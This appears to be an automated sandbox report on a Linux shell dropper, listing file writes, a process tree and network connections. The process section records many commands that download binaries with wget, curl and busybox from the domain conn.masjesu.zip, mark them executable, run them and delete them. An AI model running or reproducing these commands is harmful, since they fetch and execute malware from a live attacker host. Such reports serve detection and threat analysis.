| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | /usr/bin/curl | N/A |
Processes
/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/chmod
[chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
[./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/rm
[rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/chmod
[chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
[./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/rm
[rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/chmod
[chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
[./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/rm
[rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/chmod
[chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
[./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/rm
[rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/chmod
[chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
[./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/rm
[rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/chmod
[chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
[./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/rm
[rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/chmod
[chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
[./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/rm
[rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/chmod
[chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
[./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/rm
[rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/chmod
[chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
[./DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/rm
[rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/chmod
[chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
[./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/rm
[rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/chmod
[chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
[./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/rm
[rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/chmod
[chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
[./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/rm
[rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/chmod
[chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
[./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/rm
[rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/chmod
[chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
[./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/rm
[rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/chmod
[chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
[./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/bin/rm
[rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/chmod
[chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
[./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/bin/rm
[rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/chmod
[chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
[./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/bin/rm
[rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/chmod
[chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
[./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/rm
[rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/chmod
[chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
[./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/rm
[rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/chmod
[chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
[./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/rm
[rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/chmod
[chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
[./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/rm
[rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/chmod
[chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
[./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/rm
[rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/chmod
[chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
[./DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/rm
[rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/chmod
[chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
[./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/rm
[rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/chmod
[chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
[./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/rm
[rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/chmod
[chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
[./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/rm
[rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/chmod
[chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
[./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/rm
[rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/chmod
[chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
[./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/rm
[rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
